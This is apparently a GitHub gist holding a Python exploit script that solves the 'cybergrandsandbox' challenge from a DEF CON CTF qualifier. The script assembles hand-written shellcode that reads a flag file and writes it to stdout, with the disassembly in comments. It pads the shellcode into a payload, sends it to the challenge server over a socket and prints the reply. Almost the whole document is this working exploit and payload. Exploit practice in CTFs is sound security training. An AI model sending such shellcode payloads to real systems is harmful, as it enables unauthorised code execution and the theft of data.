@jgor
Last active February 1, 2018 06:23
#!/usr/bin/env python
import socket
# Disassembly of the shellcode below (DECREE-style syscall numbers):
# b8 03 00 00 00    mov $0x3,%eax     # syscall 3 (read)
# bb 03 00 00 00    mov $0x3,%ebx     # from fd 3 (flag file)
# 89 e1             mov %esp,%ecx     # to stack
# ba 30 00 00 00    mov $0x30,%edx    # 0x30 bytes
# cd 80             int $0x80         # perform syscall
# b8 02 00 00 00    mov $0x2,%eax     # syscall 2 (write)
# bb 01 00 00 00    mov $0x1,%ebx     # to fd 1 (stdout)
# 89 e1             mov %esp,%ecx     # from stack
# ba 30 00 00 00    mov $0x30,%edx    # 0x30 bytes
# cd 80             int $0x80         # perform syscall
# b8 01 00 00 00    mov $0x1,%eax     # syscall 1 (exit)
# bb 00 00 00 00    mov $0x0,%ebx     # return code 0
# cd 80             int $0x80         # perform syscall
shellcode = "0x80cd0000 0x0000bb00 0x000001b8 0x80cd80cd " \
+ "0x00000030 0xbae18900 0x000001bb 0x00000002 " \
+ "0xb880cd00 0x000030ba 0xe1890000 0x0003bb00 " \
+ "0x000003b8 "
payload = "0x0 "*278 + shellcode + "0x0 "*3 + "\n"
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((
'cybergrandsandbox_e722a7ec2ad46b9fb8472db37cb95713.quals.shallweplayaga.me',
4347
))
s.recv(256)
s.send(payload)
output = s.recv(256)
print output